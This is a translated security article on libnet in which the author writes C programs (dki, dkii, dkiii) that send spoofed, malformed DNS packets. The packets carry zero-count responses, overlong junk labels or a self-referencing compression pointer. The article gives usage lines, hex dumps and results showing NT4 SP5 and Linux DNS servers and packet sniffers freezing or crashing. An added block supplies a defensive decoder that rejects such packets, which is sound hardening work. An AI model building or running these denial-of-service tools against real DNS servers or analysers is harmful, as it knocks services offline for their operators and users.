Libnet example (8)

Author: Small four <mailto: scz@nsfocus.com>
Home: http://www.nsfocus.com
Date:

This time we get to appreciate the charm of C programming. Look at the function prototype below:

int libnet_build_dns(u_short id, u_short flags, u_short num_q,
                     u_short num_anws_rr, u_short num_auth_rr,
                     u_short num_addi_rr, const u_char *payload,
                     int payload_s, u_char *buf);

This function builds DNS packets. The meaning of its parameters is not explained clearly in the libnet manual;
I gave a very detailed explanation in article (7), so refer to that. The flags field and the four counts that
follow it are given exactly as they should appear in the packet, with no byte-order conversion on our side:
for example, if we want netxray to show the flags field as 0x8000, we pass 0x8000.

The following macro is defined in /usr/include/libnet/libnet-headers.h:

#define LIBNET_DNS_H 0xc /* DNS header base: 12 bytes */

First, something harmless: a very simple abnormal DNS response. It is said that a response in this format
causes a DoS against NT's DNS server, but I did not succeed, and I do not know when that was.

The target IP is given on the command line; if no source IP is given, a random one is used; the number of
DNS response packets to send is also given.

--------------------------------------------------------------------------
/* packet, packet_size and rawsocket are globals set up by the caller (see the main() excerpts below) */
void dnssend(u_long srcip, u_long dstip, u_long dnsnumber)
{
    u_long d;

    /* Construct the IP header */
    libnet_build_ip(LIBNET_UDP_H + LIBNET_DNS_H, /* length of the IP data area */
                    IPTOS_LOWDELAY,              /* IP ToS */
                    (u_short)random(),           /* IP id */
                    0,                           /* frag stuff */
                    255,                         /* TTL */
                    IPPROTO_UDP,                 /* upper-layer protocol */
                    srcip,                       /* source IP, big-endian order */
                    dstip,                       /* target IP */
                    NULL,                        /* no options */
                    0,                           /* option length 0 */
                    packet);                     /* points at the IP header */
    /* Construct the UDP header */
    libnet_build_udp(53,                                  /* source port */
                     53,                                  /* target port */
                     packet + LIBNET_IP_H + LIBNET_UDP_H, /* payload */
                     LIBNET_DNS_H,                        /* payload length */
                     packet + LIBNET_IP_H);
    /* Construct the abnormal DNS response header */
    libnet_build_dns(0, 0x8000, 0, 0, 0, 0, NULL, 0,
                     packet + LIBNET_IP_H + LIBNET_UDP_H);
    /* Compute the UDP checksum; the IP checksum is computed by the kernel */
    libnet_do_checksum(packet, IPPROTO_UDP, LIBNET_UDP_H + LIBNET_DNS_H);
    for (d = 0; d < dnsnumber; d++)
    {
        /* Send the DNS packet */
        libnet_write_ip(rawsocket, packet, packet_size);
    } /* end of for */
    return;
} /* end of dnssend */
--------------------------------------------------------------------------

Usage: ./dki [--si srcip] [--di dstip] [--num dnsnumber]

This DoS was not tested over the wide area network; I do not know which version of the NT DNS server can be
paralyzed by a single packet. On the local network, multiple packets freeze the target host. The test results
are as follows:

1) 10.60 is an NT4 DNS server. It freezes completely, but this affects neither pings from 8.90 to 10.60 nor
its IIS service.
2) 0.2 is a Linux DNS server. It freezes completely: from 8.90 you cannot ping 0.2, and telnet 192.168.0.2 53
fails. Ironic.

The format of this so-called abnormal DNS response is as follows:

00 00 00 11 11 11 00 10 14 FF 08 00
45 10 00 28 6e 17 00 FF 11 BB 98 C0 A8 08 5A C0 A8 08 5A
00 35 00 35 00 14 ed 56
00 00 80 00 00 00 00 00 00 00

The last line shows the problem at a glance: the question and answer counts are all zero, while the flags say
this is a response to a forward lookup. Is that possible? It is not! Yet some DNS implementations do not treat
it as an error; I have tried to explain this.

There are many conceivable DoS cases in DNS. For example, a DNS request normally does not contain the
compressed name format; in fact I have not confirmed how the various systems react when the compressed format
does appear in a request. Analysis software, for its part, parses the compressed format in a DNS request
without reporting an error, and that is where the opportunity begins: if we make the pointer form a loop,
netxray's attempt to decode the packet terminates. Sniffer Pro 2.6 and later defend against this; although
they also parse the compressed format and likewise fall into the loop, a bounds check prevents the process
from terminating. Sniffer was not tested.

Why create the loop in a request rather than a response? Because a response's ID may be checked and the packet
discarded, even though the compressed format in a response would be parsed. I can only bet that the system's
DNS calls the same function for the question section and the answer section and does not distinguish which
section is currently being parsed; if the bet holds, the DNS implementation dies. Note: when attacking a
sniffer the ID is not checked, so request or response makes no difference.

Is there a length limit on the uncompressed format? If not, a name can be extended indefinitely, since the end
is marked by a 00 byte and not bounded by any length field.

I wrote two more test programs for the boundary tests above, aimed at DNS servers and sniffers.

--------------------------------------------------------------------------
......
    /* 13 = "www" (4) + "com" (4) + end mark (1) + type/class (4);
       each junk label is one length byte plus maxi junk bytes (maxiplusone) */
    dnsdatasize = 13 + maxiplusone * junknumber;
    packet_size += dnsdatasize;
    fprintf(stderr, "[DNS killing...]\n");
    /* Allocate memory and zero it */
    libnet_init_packet(packet_size, &packet);
    /* Construct the data section of the DNS packet here */
    dnsdata = packet + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
    dnsdata[0] = 0x03; /* "www" */
    dnsdata[1] = 0x77;
    dnsdata[2] = 0x77;
    dnsdata[3] = 0x77;
    dnsdataindex = 4;
    for (j = 0; j < junknumber; j++)
    {
        dnsdata[dnsdataindex++] = maxi; /* label length field, 63 */
        for (i = 0; i < maxi; i++)
        {
            dnsdata[dnsdataindex++] = junkchar;
        }
    } /* end of for */
    dnsdata[dnsdataindex++] = 0x03; /* "com" */
    dnsdata[dnsdataindex++] = 0x63;
    dnsdata[dnsdataindex++] = 0x6f;
    dnsdata[dnsdataindex++] = 0x6d;
    dnsdata[dnsdataindex++] = 0x00; /* end mark */
    dnsdata[dnsdataindex++] = 0x00; /* type = A */
    dnsdata[dnsdataindex++] = 0x01;
    dnsdata[dnsdataindex++] = 0x00; /* class = IN */
    dnsdata[dnsdataindex] = 0x01;
    /* Create the raw socket */
    rawsocket = libnet_open_raw_sock(IPPROTO_RAW);
    dnssend(srcip, dstip, dnsnumber);
    /* Close the raw socket */
    libnet_close_raw_sock(rawsocket);
    /* Free the memory allocated by libnet_init_packet */
    libnet_destroy_packet(&packet);
......
--------------------------------------------------------------------------

Usage: ./dkii [--si srcip] [--di dstip] [--num dnsnumber] [--junk junknumber]

Testing showed there is no need to tamper with pointers to create an infinite loop: abnormally extending the
query name in uncompressed format is enough to terminate netxray's decode. For example, with --junk 4 netxray
reports that it was forced to terminate the decode operation. Sniffer Pro is far more stable than netxray
against abnormal DNS packets. Lanw.e 3.5 terminates abnormally when it tries to parse such packets.

The abnormal DNS request sent by dkii looks like the following; there are junknumber of the
3f 61 ... 61 labels.

--------------------------------------------------------------------------
42 83          ID        identifier, randomized
01 00          param     flags: a request packet, recursion desired
00 01          qtcount   question count
00 00          ancount   answer count
00 00          aucount   authority count
00 00          adcount   additional count

03 77 77 77    "www", label length 3
3f 61 ... 61   label length field 63
3f 61 ... 61   label length field 63
......
3f 61 ... 61   label length field 63
03 63 6f 6d    "com", label length 3
00             end mark
00 01          type = A record
00 01          class = IN, the ARPA Internet
--------------------------------------------------------------------------

--------------------------------------------------------------------------
......
    dnsdatasize = 15;
    packet_size += dnsdatasize;
    fprintf(stderr, "[DNS killing...]\n");
    /* Allocate memory and zero it */
    libnet_init_packet(packet_size, &packet);
    /* Construct the data section of the DNS packet here */
    dnsdata = packet + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
    dnsdata[0] = 0x03; /* "www" */
    dnsdata[1] = 0x77;
    dnsdata[2] = 0x77;
    dnsdata[3] = 0x77;
    dnsdata[4] = 0xc0; /* pointer = 12, which actually points back at "www" */
    dnsdata[5] = 0x0c;
    dnsdata[6] = 0x03; /* "com" */
    dnsdata[7] = 0x63;
    dnsdata[8] = 0x6f;
    dnsdata[9] = 0x6d;
    dnsdata[10] = 0x00; /* end mark */
    dnsdata[11] = 0x00; /* type = A */
    dnsdata[12] = 0x01;
    dnsdata[13] = 0x00; /* class = IN */
    dnsdata[14] = 0x01;
    /* Create the raw socket */
......
--------------------------------------------------------------------------

Usage: ./dkiii [--si srcip] [--di dstip] [--num dnsnumber]

The abnormal DNS request sent by dkiii looks like the following and creates a parsing loop: netxray
terminates, and Lanw.e 3.5 terminates abnormally when it tries to parse such packets.

--------------------------------------------------------------------------
42 83          ID        identifier, randomized
01 00          param     flags: a request packet, recursion desired
00 01          qtcount   question count
00 00          ancount   answer count
00 00          aucount   authority count
00 00          adcount   additional count

03 77 77 77    "www", label length 3
c0 0c          pointer = 12; a pointer where no pointer should appear, creating a parsing loop
03 63 6f 6d    "com", label length 3
00             end mark
00 01          type = A record
00 01          class = IN, the ARPA Internet
--------------------------------------------------------------------------
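The two malformations above, the dkii name that grows past any limit and the dkiii pointer that points back at its own name, are exactly what a robust name decoder has to reject. The following is an added example written for this page, not code from the original article or from libnet: a C decoder for DNS names that caps the expanded name at 255 octets and only follows pointers that land strictly earlier in the message, tried against constructed copies of the dkii and dkiii question sections. The `check_query` helper and its constants are assumptions made for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#define DNS_HDR_LEN 12
#define MAX_NAME_LEN 255   /* RFC 1035 cap on the whole wire name, root included */
enum { NAME_OK = 0, NAME_TRUNCATED = -1, NAME_LOOP = -2, NAME_TOO_LONG = -3, NAME_BAD_LABEL = -4 };

/* Decode the name at msg[off] into out (dotted form). A pointer must land in the body and
 * strictly before every position visited so far, so the dkiii c0 0c (offset 16 back to its
 * own name at 12) is rejected at once and no loop can form; the 255-octet cap stops dkii. */
int decode_name(const uint8_t *msg, size_t len, size_t off, char *out, size_t outsz)
{
    size_t pos = off, lowest = off, total = 0, o = 0;
    if (outsz == 0) return NAME_TOO_LONG;
    for (;;) {
        if (pos >= len) return NAME_TRUNCATED;
        uint8_t l = msg[pos];
        if ((l & 0xC0) == 0xC0) {                                /* 11xxxxxx: pointer */
            if (pos + 1 >= len) return NAME_TRUNCATED;
            size_t target = ((size_t)(l & 0x3F) << 8) | msg[pos + 1];
            if (target < DNS_HDR_LEN || target >= lowest) return NAME_LOOP;
            pos = lowest = target;
            continue;
        }
        if (l & 0xC0) return NAME_BAD_LABEL;                      /* 01/10 are reserved */
        if (l == 0) { out[o] = '\0'; return NAME_OK; }          /* root label ends it */
        if (pos + 1 + l > len) return NAME_TRUNCATED;
        total += 1 + l;
        if (total >= MAX_NAME_LEN || o + l + 1 >= outsz) return NAME_TOO_LONG;
        if (o) out[o++] = '.';
        memcpy(out + o, msg + pos + 1, l);
        o += l; pos += 1 + l;
    }
}

/* Constructed query of the article's shape (header, "www", then either the dkiii pointer
 * c0 0c or `junk` labels of 63 'a' as in dkii, then "com", root, type A, class IN);
 * builds it in memory and decodes its question name, returning decode_name's code. */
int check_query(int junk, int with_pointer)
{
    static const uint8_t hdr[DNS_HDR_LEN] = {0x42, 0x83, 0x01, 0x00, 0x00, 0x01};
    static const uint8_t www[] = {3, 'w', 'w', 'w'}, tail[] = {3, 'c', 'o', 'm', 0, 0, 1, 0, 1};
    uint8_t msg[1024]; char name[256]; size_t n = DNS_HDR_LEN;
    if (junk < 0 || sizeof msg < DNS_HDR_LEN + 15 + (size_t)junk * 64) return NAME_TRUNCATED;
    memcpy(msg, hdr, DNS_HDR_LEN);
    memcpy(msg + n, www, sizeof www); n += sizeof www;
    if (with_pointer) { msg[n++] = 0xc0; msg[n++] = 0x0c; }
    for (int j = 0; j < junk; j++) { msg[n++] = 63; memset(msg + n, 'a', 63); n += 63; }
    memcpy(msg + n, tail, sizeof tail); n += sizeof tail;
    return decode_name(msg, n, DNS_HDR_LEN, name, sizeof name);
}
```

With three junk labels the name is 200 octets and decodes; with four (the --junk 4 case above) it reaches 260 octets and is rejected, and the dkiii pointer is rejected on its first hop.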

Adam worked with us on the following tests:

Running ./dkii --si 192.168.10.60 --di 192.168.10.60 --num 5 --junk 4
crashes the NT4 SP5 DNS server.

Running ./dkiii --si 192.168.10.60 --di 192.168.10.60 --num 5 also
crashes the NT4 SP5 DNS server.

The operations above require the source and target IP addresses to be the same, and they reproduce exactly.
dkiii takes effect quickly; with dkii you have to wait a moment to see the effect. net start dns restores
the service.

SP6 is not affected. With the current network layout the source IP equals the target IP, so the attack is
launched within the local network. That concludes the DNS DoS.
